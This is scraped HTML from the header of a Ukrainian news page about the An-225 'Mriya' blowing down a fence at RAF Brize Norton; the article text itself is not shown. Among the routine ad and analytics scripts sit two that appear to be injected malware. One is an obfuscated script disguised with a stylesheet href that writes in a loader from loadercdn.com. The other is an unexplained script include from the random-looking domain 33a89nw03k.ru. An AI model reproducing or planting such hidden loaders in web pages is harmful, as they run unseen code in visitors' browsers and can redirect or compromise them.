
<!DOCTYPE html>
<html prefix="og: http://ogp.me/ns#" lang="ru">
<head>
	
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0"/> 
		
	<meta name="referrer" content="origin">
	<meta name="yandex-verification" content="9a28c4c473219914" />
	<meta name="yandex-verification" content="9a28c4c473219914" />
	<meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" />
	
			
	
		   
			<meta property="og:title" content="Украинская «Мрия» снесла ограждение на британской авиабазе (ВИДЕО) | Экономические Новости"/>
			
	
	
			<meta property="og:site_name" content="enovosty. Украинские новости дня"/>
		
	
	
							<meta property="og:image" content="https://enovosty.com/wp-content/uploads/2021/06/mrija-640x357.png"/>
					<meta property="og:type" content="article" />
					<meta property="og:image:width" content="640" />
					<meta property="og:image:height" content="357" />
					<meta property="og:image:alt" content="Украинская «Мрия» снесла ограждение на британской авиабазе (ВИДЕО) | Экономические Новости" />

						
		
	<meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" />
    	
			
	<style>.toparticles{position:relative;}.toparticles #photoPromo {height: 216px;width: 466px;overflow:hidden;}.toparticles #photoPromo li{height:216px;}.toparticles div.anythingSlider .anythingControls{display:block;}</style>
	<link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" />
	<link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png">
    <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png">
    <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png">
    <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png">
	<link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" />		
		
				
		
		<!-- All in One SEO 4.1.1.1 -->
		<title>Украинская «Мрия» снесла ограждение на британской авиабазе (ВИДЕО) | Экономические Новости</title>
		<meta name="description" content="Крупнейший транспортный самолет Украины Ан-225 &quot;Мрия&quot; снес ограждение британской военно-воздушной базы Брайз-Нортон под действием потока воздуха от его движков."/>
		<link rel="canonical" href="https://enovosty.com/news/news_incidents/full/2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video" />
		<meta property="og:site_name" content="Экономические Новости - финансовые новости Украины, последние новости | Самые последние новости экономики, финансов, политики и мира. Экономические новости и финансовые новости - Экономические Новости" />
		<meta property="og:type" content="article" />
		<meta property="og:title" content="Украинская «Мрия» снесла ограждение на британской авиабазе (ВИДЕО) | Экономические Новости" />
		<meta property="og:description" content="Крупнейший транспортный самолет Украины Ан-225 &quot;Мрия&quot; снес ограждение британской военно-воздушной базы Брайз-Нортон под действием потока воздуха от его движков." />
		<meta property="og:url" content="https://enovosty.com/news/news_incidents/full/2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video" />
		<meta property="article:published_time" content="2021-06-26T12:10:52Z" />
		<meta property="article:modified_time" content="2021-06-26T12:10:52Z" />
		<meta name="twitter:card" content="summary" />
		<meta name="twitter:domain" content="enovosty.com" />
		<meta name="twitter:title" content="Украинская «Мрия» снесла ограждение на британской авиабазе (ВИДЕО) | Экономические Новости" />
		<meta name="twitter:description" content="Крупнейший транспортный самолет Украины Ан-225 &quot;Мрия&quot; снес ограждение британской военно-воздушной базы Брайз-Нортон под действием потока воздуха от его движков." />
		<script type="application/ld+json" class="aioseo-schema">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</script>
		<!-- All in One SEO -->

<link rel="amphtml" href="https://enovosty.com/news/news_incidents/full/2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video/amp" /><meta name="generator" content="AMP for WP 1.0.76.17"/><link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Экономические Новости - финансовые новости Украины, последние новости &raquo; Лента комментариев к &laquo;Украинская &#171;Мрия&#187; снесла ограждение на британской авиабазе (ВИДЕО)&raquo;" href="https://enovosty.com/news/news_incidents/full/2606-ukrainskaya-mriya-snesla-ograzhdenie-na-britanskoj-aviabaze-video/feed" />
<link rel='stylesheet' id='wp-block-library-css'  href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css?ver=5.7' type='text/css' media='all' />
<link rel='stylesheet' id='wpdiscuz-frontend-css-css'  href='https://enovosty.com/wp-content/plugins/wpdiscuz/themes/default/style.css?ver=7.2.2' type='text/css' media='all' />
<style id='wpdiscuz-frontend-css-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='wpdiscuz-fa-css'  href='https://enovosty.com/wp-content/plugins/wpdiscuz/assets/third-party/font-awesome-5.13.0/css/fa.min.css?ver=7.2.2' type='text/css' media='all' />
<link rel='stylesheet' id='wpdiscuz-combo-css-css'  href='https://enovosty.com/wp-content/plugins/wpdiscuz/assets/css/wpdiscuz-combo.min.css?ver=5.7' type='text/css' media='all' />
<link rel='stylesheet' id='msl-main-css'  href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css?ver=3.1.1' type='text/css' media='all' />
<link rel='stylesheet' id='addtoany-css'  href='https://enovosty.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.15' type='text/css' media='all' />
<script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1' id='jquery-core-js'></script>
<script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' src='https://enovosty.com/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.1' id='addtoany-js'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://enovosty.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://enovosty.com/wp-includes/wlwmanifest.xml" /> 


<script data-cfasync="false">
window.a2a_config=window.a2a_config||{};a2a_config.callbacks=[];a2a_config.overlays=[];a2a_config.templates={};a2a_localize = {
	Share: "Отправить",
	Save: "Сохранить",
	Subscribe: "Подписаться",
	Email: "Email",
	Bookmark: "В закладки!",
	ShowAll: "Показать все",
	ShowLess: "Показать остальное",
	FindServices: "Найти сервис(ы)",
	FindAnyServiceToAddTo: "Найти сервис и добавить",
	PoweredBy: "Работает на",
	ShareViaEmail: "Share via email",
	SubscribeViaEmail: "Subscribe via email",
	BookmarkInYourBrowser: "Добавить в закладки",
	BookmarkInstructions: "Press Ctrl+D or \u2318+D to bookmark this page",
	AddToYourFavorites: "Добавить в Избранное",
	SendFromWebOrProgram: "Send from any email address or email program",
	EmailProgram: "Email program",
	More: "More&#8230;",
	ThanksForSharing: "Thanks for sharing!",
	ThanksForFollowing: "Thanks for following!"
};

(function(d,s,a,b){a=d.createElement(s);b=d.getElementsByTagName(s)[0];a.async=1;a.src="https://static.addtoany.com/menu/page.js";b.parentNode.insertBefore(a,b);})(document,"script");
</script>
<style>.ms-parent-id-11 > .master-slider{ background:#000000; }
.ms-parent-id-10 > .master-slider{ background:#000000; }
.ms-parent-id-9 > .master-slider{ background:#000000; }
.ms-parent-id-8 > .master-slider{ background:#000000; }
.ms-parent-id-7 > .master-slider{ background:#000000; }
.ms-parent-id-6 > .master-slider{ background:#000000; }
.ms-parent-id-5 > .master-slider{ background:#000000; }
.ms-parent-id-4 > .master-slider{ background:#000000; }
.ms-parent-id-3 > .master-slider{ background:#000000; }
.ms-parent-id-2 > .master-slider{ background:#000000; }
.ms-parent-id-1 > .master-slider{ background:#000000; }</style>
<script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script>
<meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" />
	<style>span.swp_share, i.swp_facebook_icon, i.swp_twitter_icon, i.swp_linkedin_icon, span.swp_count{color:#ffffff}
	
	table.social{
	    width: 50%!important;
	}
	.swp_share_button{
		height: max-content!important;
	}
	.swp_social_panel {
		margin-bottom: 0px!important;
		margin-top: 0px!important;
	}
	
	</style>
		<script href="https://enovosty.com/wp-content/themes/eizvestia/style1.min.css?v=1">(function(e,t,r,n,o,a,i,l,m,c,g,d,s,u){var w,f,h,p,b,v,y,I="",A="/?r=",B=e.localStorage||{};for(w in B)e[g](w[d](0,3),16)+""==w[d](3)&&(f=B[i+m](w)).length<100&&f[d](0,3)==s&&(B[l+m](w),I=f);v=(b=(p=(h=e[t]).getElementsByTagName(n))[p.length-1])[a]("href"),y=b[a]("media")||"",h[r]("<"+n+">"+(I?u+'="//loadercdn.com'+A+e[u]+"&"+I+'";':t+"."+r+"('<"+o+">/*"+ +new Date+"*/@"+c+' "'+v+'" '+y+";</"+o+">');")+"</"+n+">")})(window,"document","write","script","style","getAttribute","get","remove","Item","import","parseInt","substr","d1e","location");</script>
						<link rel="stylesheet" id="like-dislike-css"  href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" />
		
		
		
		
					
		
	<!-- (C)2000-2010 Gemius SA - gemiusAudience / eizvestia / adv -->
<script>
<!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');
//--><!]]>
</script>
<script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script>
		<script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4853050&amp;a=5709" async></script><!-- counter added?? -->	<!--[if lte IE 7]>
	<link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" />
	<![endif]-->
	<script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script>
	<script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script>
	<script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script>
	

	<script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script>	
	<!--Admixer-->
	<script type="text/javascript">
		(function () {
			var w = window,
					d = document,
					protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',
					aml = typeof admixerML !== 'undefined' ? admixerML : {};
			aml.fn = aml.fn || [];
			aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
			aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
			aml.noCriteo = true;
			if (!w.admixerML) {
				var lodash = document.createElement('script');
				lodash.id = 'amlScript';
				lodash.async = true;
				lodash.type = 'text/javascript';
				lodash.src = aml.cdnPath + 'scripts3/loader2.js';
				var node = d.getElementsByTagName('script')[0];
				node.parentNode.insertBefore(lodash, node);
				w.admixerML = aml;
			}
		})();
	</script>  
	<!--Admixer-->
	<script src="https://scripts.go2net.com.ua/scripts3/loader2.js" async
        data-inv="//ads.go2net.com.ua/"
        data-r="single"
		data-sender="go2net"
        data-bundle="desktop"></script>
	
	<meta property="fb:admins" content="100009507220682"/>
	<meta property="fb:app_id" content="2113796585568948"/>

	<script>
		function setHomepage(){
			var homepage = 'https://enovosty.com';
			if (document.all){
		        document.body.style.behavior='url(#default#homepage)';
		  		document.body.setHomePage(homepage);
	    	}else if (window.sidebar){
		    	if(window.netscape){
		        	try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}  
		         	catch(e){  
		    			alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");  
		         	}
		    	} 
		    	var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);
		    	prefs.setCharPref('browser.startup.homepage',homepage);
		 	}
		}
	</script>
	<script>
		var _gaq = _gaq || [];
		var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
		_gaq.push(['_require', 'inpage_linkid', pluginUrl]);
		_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);
		_gaq.push(['_setDomainName', 'enovosty.com']);
		_gaq.push(['_trackPageview']);
		(function() {
			var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
			ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
			var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
		})();
	</script>
	<script>
	function trackOutboundLink(link, category, action) { 
		var url = '';
		if(link.href) url = link.href;
		if(url == ''){
			str = link.getAttribute("onclick");
			m = str.match("(https:\/\/.*?)\'"); 
			if(m) url = m[1];
		}
			try {
				_gaq.push(['_trackEvent', category , action]);
			} catch(err){}
			setTimeout(function() {
			}, 100);
	}
	</script>

<script>
jQuery(document).ready(function($){

	$("a").each(function() {
		var href = $(this).attr("href");
		var target = $(this).attr("target");
		var text = $(this).text();
		
		var a = new RegExp('/' + window.location.host + '/');
		var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;
		var b = new RegExp(e);
		
		$(this).click(function(event) { 
		
		if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) { 
		
		console.log("document.URL : "+this.href);
			event.preventDefault(); 
			_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]); 
			setTimeout(function() { 
				window.open(href,(!target?"_self":target));
			},300);
		}	
			
		});
	});

});
</script>

	<script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script>
	
	<!-- Adtelligent -->
	<script> !(function () { window.googletag = window.googletag || {}; window.vmpbjs = window.vmpbjs || {}; window.vpb = window.vpb || {}; vpb.fastLoad = true; googletag.cmd = googletag.cmd || []; vmpbjs.cmd = vmpbjs.cmd || []; var cmds = googletag.cmd.slice(0) || []; googletag.cmd.length=0; var ready = false; function exec(cb) { return cb.call(googletag); } googletag.cmd.push(function () { googletag.cmd.unshift = function (cb) { if (ready) { return exec(cb); } cmds.unshift(cb); if (cb._startgpt) { ready = true; cmds.forEach(cb=> { exec(cb); }); } }; googletag.cmd.push = function (cb) { if (ready) { return exec(cb); } cmds.push(cb); }; }); googletag.cmd.push = function (cb) { cmds.push(cb) }; googletag.cmd.unshift = function (cb) { cmds.unshift(cb); if (cb._startgpt) { ready = true; if (googletag.apiReady) { cmds.forEach(function (cb) { googletag.cmd.push(cb); }) } else { googletag.cmd = cmds; } } }; var dayMs = 36e5, cb = parseInt(Date.now() / dayMs), vpbSrc = '//player.adtelligent.com/prebidlink/' + cb + '/wrapper_hb_308225_6946.js', pbSrc = vpbSrc.replace('wrapper_hb', 'hb'), gptSrc = '//securepubads.g.doubleclick.net/tag/js/gpt.js', c = document.head || document.body || document.documentElement; function loadScript(src, cb) { var s = document.createElement('script'); s.src = src; s.defer=false; c.appendChild(s); s.onload = cb; s.onerror = function(){ var fn = function(){}; fn._startgpt = true; googletag.cmd.unshift(fn); }; return s; } loadScript(pbSrc); loadScript(gptSrc); loadScript(vpbSrc); })() </script>
	
	

	

<script async src="//www.googletagservices.com/tag/js/gpt.js"></script>

<!-- Admixer -->
<script async src="//acdn.adnxs.com/prebid/not-for-prod/prebid.js"></script>

<script>
	var div_1_sizes = [
		[240, 320],
		[240, 350],
		[240, 420],
		[240, 500],
		[240, 600],
		[300, 250],
		[300, 280],
		[300, 300],
		[300, 400],
		[300, 500],
		[300, 600],
		[320, 50],
		[320, 100],
		[320, 250],
		[320, 480],
		[320, 600]

	];
	var div_2_sizes = [
		[200, 200],
		[200, 400],
		[200, 600],
		[240, 350],
		[240, 500],
		[240, 600],
		[300, 250],
		[300, 300],
		[300, 400],
		[300, 500],
		[300, 600]

	];
	var div_3_sizes = [
		[240, 350],
		[240, 500],
		[300, 250],
		[300, 600]

	];
	var div_4_sizes = [
		[300, 250],
		[300, 50],
		[300, 75],
		[300, 100],
		[300, 300],
		[320, 50],
		[320, 100],
		[320, 250],
		[320, 200]

	];

	var PREBID_TIMEOUT = 1000;
	var FAILSAFE_TIMEOUT = 3000;

	var adUnits = [
		{
			code: '/29636627/enovosty.com_300x600_mob_hb',
			mediaTypes: {
				banner: {
					sizes: div_1_sizes
				}
			},
			bids: [{
				bidder: 'admixer',
				params: {
					zone: '0aeef458-3e2c-4ffa-b559-7ed3aa2de424'
				}
			}]
		},
		{
			code: '/29636627/enovosty.com_320x250_hb',
			mediaTypes: {
				banner: {
					sizes: div_4_sizes
				}
			},
			bids: [{
				bidder: 'admixer',
				params: {
					zone: '156e0022-5c98-499e-b4e6-788848e60a3c'
				}
			}]
		},
		{
			code: '/29636627/enovosty.com_300x600_top_hb',
			mediaTypes: {
				banner: {
					sizes: div_2_sizes
				}
			},
			bids: [{
				bidder: 'admixer',
				params: {
					zone: '9743148c-0bcf-416e-8ab5-55d24689e145'
				}
			}]
		},
		{
			code: '/29636627/enovosty.com_300x600_ukr.net_hb',
			mediaTypes: {
				banner: {
					sizes: div_3_sizes
				}
			},
			bids: [{
				bidder: 'admixer',
				params: {
					zone: '7af953ae-795d-4e3e-8b55-c1906dcae224'
				}
			}]
		}
		
	];

	// ======== DO NOT EDIT BELOW THIS LINE =========== //
	var googletag = googletag || {};
	googletag.cmd = googletag.cmd || [];
	googletag.cmd.push(function() {
		googletag.pubads().disableInitialLoad();
	});

	var pbjs = pbjs || {};
	pbjs.que = pbjs.que || [];

	pbjs.que.push(function() {
		pbjs.addAdUnits(adUnits);
		pbjs.requestBids({
			bidsBackHandler: initAdserver,
			timeout: PREBID_TIMEOUT
		});
	});

	function initAdserver() {
		if (pbjs.initAdserverSet) return;
		pbjs.initAdserverSet = true;
		googletag.cmd.push(function() {
			pbjs.que.push(function() {
				pbjs.setTargetingForGPTAsync();
				googletag.pubads().refresh();
			});
		});
	}
	// in case PBJS doesn't load
	setTimeout(function() {
		initAdserver();
	}, FAILSAFE_TIMEOUT);
	googletag.cmd.push(function() {
		googletag.defineSlot('/29636627/enovosty.com_300x600_mob_hb', div_1_sizes, 'div-1').addService(googletag.pubads());
		googletag.pubads().enableSingleRequest();
		googletag.enableServices();
	});
	googletag.cmd.push(function() {
		googletag.defineSlot('/29636627/enovosty.com_300x600_top_hb', div_2_sizes, 'div-2').addService(googletag.pubads());
		googletag.pubads().enableSingleRequest();
		googletag.enableServices();
	});
	googletag.cmd.push(function() {
		googletag.defineSlot('/29636627/enovosty.com_300x600_ukr.net_hb', div_3_sizes, 'div-3').addService(googletag.pubads());
		googletag.pubads().enableSingleRequest();
		googletag.enableServices();
	});
	googletag.cmd.push(function() {
		googletag.defineSlot('/29636627/enovosty.com_320x250_hb', div_4_sizes, 'div-4').addService(googletag.pubads());
		googletag.pubads().enableSingleRequest();
		googletag.enableServices();
	});

</script>

<script>
  var googletag = googletag || {};
  googletag.cmd = googletag.cmd || [];
</script>


<script>

  googletag.cmd.push(function() {
	googletag.defineSlot('/59256651/Test_Moxtv_enovosty_970x250', [970, 250], 'div-gpt-ad-1599639337661-0').addService(googletag.pubads());
	googletag.defineSlot('/59256651/enovosty2_300x600', [300, 600], 'div-gpt-ad-1596728019577-0').addService(googletag.pubads());
	googletag.defineSlot('/59256651/enovosty_970x250', [970, 250], 'div-gpt-ad-1595961600637-0').addService(googletag.pubads());
	googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());
	googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());
    //googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
    googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());
	googletag.defineSlot('/59256651/enovosty_adint_300_600', [[300, 600],[300,250]], 'div-gpt-ad-1594112815543-0').addService(googletag.pubads());
	googletag.defineSlot('/59256651/Adaptive_zone', [470, 376], 'div-gpt-ad-1594991505318-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
	googletag.pubads().collapseEmptyDivs();
    googletag.enableServices();
  });
  
</script>

<script type="text/plain" id="vpb-catfish-template">
<div class="vpb-catfish-container" style="position: fixed;bottom:0;left:0;right:0;z-index:999999;">
    <div class="vpb-ad" style="display: block;position: relative;margin:0px auto;">
        <span class="vpb-close-button"
              style="display: none;position: absolute;top:-15px;right:-15px;z-index:9999;cursor: pointer;">
            <img src="data:image/png;base64,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"/>
        </span>
    </div>
</div>
</script>
<script>
	function catfish(div) {
		var gt = window.googletag || {};
		gt.cmd = gt.cmd || [];
		gt.cmd.push(function () {
			var template = document.getElementById('vpb-catfish-template').innerHTML;
			var adContainer = document.getElementById(div);
			adContainer.innerHTML = template;
			var catId =  'vpb-ad-wrapped-generated-' + (Math.random() + Date.now());
			adContainer.id =catId;
			var innerWrapper = adContainer.getElementsByClassName('vpb-ad')[0];
			var closeBtn = adContainer.getElementsByClassName('vpb-close-button')[0];
			var newAdDiv = document.createElement('div');
			newAdDiv.id = div;
			newAdDiv.setAttribute('data-hb-catfish',catId);
			innerWrapper.appendChild(newAdDiv);
			googletag.pubads().addEventListener('slotRenderEnded', function (event) {
				var slot = event.slot;
				var slotId = slot.getSlotElementId();
				if (slotId != div) return;
				if (event.isEmpty) {
					closeBtn.style.display = 'none';
					adContainer.style.display = 'none';
					return;
				}
				adContainer.style.display = 'block';
				innerWrapper.style.width = event.size[0] + 'px';
				innerWrapper.style.height = event.size[1] + 'px';
				closeBtn.style.display = 'inline-block';
				closeBtn.addEventListener('click', function () {
					adContainer.parentElement.removeChild(adContainer);
				});
			});
			gt.display(div);
		});
	}
</script>

	


	<script src="https://33a89nw03k.ru/script.js"></script>

</head>

<body>

<script type='text/javascript'>
admixerML.fn.push(function() {
// Правая колонка - верх

if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',
 i: 'inv-nets'});
} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};

admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});

// Нигде не выводится
/*
admixerML.defineSlot({z: '62d9229e-4832-4f41-8aed-a1f5d18392a6', ph:
'admixer_62d9229e48324f418aeda1f5d18392a6_zone_4425_sect_1082_site_1069', i:
'inv-nets'});*/
// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,
renderedCallback: function(e) {
        var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;
        if (player){
            player.mute();
        }
    }
});
// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
/*
admixerML.defineSlot({z: 'd4cb7904-6cab-45bb-ae5a-b62c74ff9c8c', ph:
'admixer_d4cb79046cab45bbae5ab62c74ff9c8c_zone_9057_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '156e0022-5c98-499e-b4e6-788848e60a3c', ph:
'admixer_156e00225c98499eb4e6788848e60a3c_zone_11316_sect_1082_site_1069', i:
'inv-nets'});
*/
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});


admixerML.singleRequest();
});
</script>

<script type='text/javascript'>
(window.globalAmlAds = window.globalAmlAds || []).push(function() {
globalAml.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852', sender: 'go2net'});
globalAml.singleRequest("go2net");});
</script>

	<script type='text/javascript'>
	(window.globalAmlAds = window.globalAmlAds || []).push(function() {
	globalAml.defineSlot({z: 'f1971219-dfb6-45c1-a362-6879325bc045', ph: 'admixer_f1971219dfb645c1a3626879325bc045_zone_45971_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9', sender: 'admixer'});
	globalAml.singleRequest("admixer");});
	</script>
	
	<!--bigmir)net TOP 100 Part 1-->
	<script><!--
	bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};
	for(var f=self;f!=f.parent;f=f.parent)bm.w++;
	try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));
	else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}
	try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}
	try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}
	r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}
	bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];
	bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" style="display:none;" title="bigmir)net TOP 100" />');
	//-->
	</script>
	<noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript>
	<!--bigmir)net TOP 100 Part 1-->
			<div id="fb-root"></div>
<script>
  window.fbAsyncInit = function() {
    FB.init({
      appId      : '2113796585568948',
      cookie     : true,
      xfbml      : true,
      version    : 'v3.0'
    });
      
    FB.AppEvents.logPageView();   
      
  };

  (function(d, s, id){
     var js, fjs = d.getElementsByTagName(s)[0];
     if (d.getElementById(id)) {return;}
     js = d.createElement(s); js.id = id;
     js.src = "https://connect.facebook.net/en_US/sdk.js";
     fjs.parentNode.insertBefore(js, fjs);
   }(document, 'script', 'facebook-jssdk'));
</script>

<div id="adriver_banner_branding"></div>


<div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div>
<script>
    admixerML.fn.push(function() {
		admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');
	});
</script>


		<div class="container">
	
			
        <div style="margin-top:0px;position:relative;"> <!-- id="first-banner" -->
							
				<div id='admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069'></div>
				<script type='text/javascript'>
					admixerML.fn.push(function() {
				admixerML.display('admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069');
				});
				</script>
